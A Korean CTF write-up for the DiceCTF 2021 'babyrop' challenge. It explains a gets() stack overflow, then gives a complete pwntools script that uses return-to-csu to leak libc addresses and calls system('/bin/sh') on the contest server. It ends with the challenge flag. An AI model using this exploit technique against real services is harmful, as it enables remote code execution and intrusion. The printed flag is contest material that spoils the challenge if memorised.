[DiceCTF 2021] babyrop

Disassembly 디스어셈블리

---

undefined8 main(void)
{
    char *s;
    
    write(1, "Your name: ", 0xb);
    gets(&s);
    return 0;
}

gets로 인해 스택 버퍼 오버플로우가 발생한다.

Return-to-csu

---

RTC를 이용해 gets와 write의 라이브러리 주소를 구하자.

 

알아낸 주소를 바탕으로 라이브러리 버전을 알아낸 후, system과 binsh 문자열의 주소를 구해 system("/bin/sh")를 호출하면 문제를 해결할 수 있다.

 

Code

from pwn import *

binary = "./babyrop"
lib = "./libc6_2.31-0ubuntu9.2_amd64.so"
server = "dicec.tf"
port = 31924

# context.log_level = 'debug'
context.binary = binary

if True:
	p = remote(server, port)
else:
	p = process(binary)
	gdb.attach(p)

e = ELF(binary)
r = ROP(e)
l = ELF(lib)

e.checksec()

main = e.symbols["main"]
gets_got = e.got["gets"]
write_got = e.got["write"]

csu_init = 0x4011ca
csu = 0x4011b0

prdi = (r.find_gadget(['pop rdi', 'ret']))[0]
ret = (r.find_gadget(['ret']))[0]

bss = e.bss()+0x100

payload = b"\x90"*0x48
payload += p64(csu_init)
payload += p64(0) + p64(1) + p64(1) + p64(write_got) + p64(0x8) + p64(write_got)
payload += p64(csu)
payload += p64(0)*7
payload += p64(main)

p.recvuntil("Your name: ")
p.sendline(payload)

write = u64(p.recv(8))

log.info("write : " + hex(write))

libc = write - l.symbols["write"]

log.info("libc : " + hex(libc))

system = libc + l.symbols["system"]
binsh = libc + next(l.search(b"/bin/sh\x00"))

payload = b"\x90"*0x48
payload += p64(ret)
payload += p64(prdi)
payload += p64(binsh)
payload += p64(system)

p.recvuntil("Your name: ")
p.sendline(payload)

p.interactive()

Flag

dice{so_let's_just_pretend_rop_between_you_and_me_was_never_meant_b1b585695bdd0bcf2d144b4b}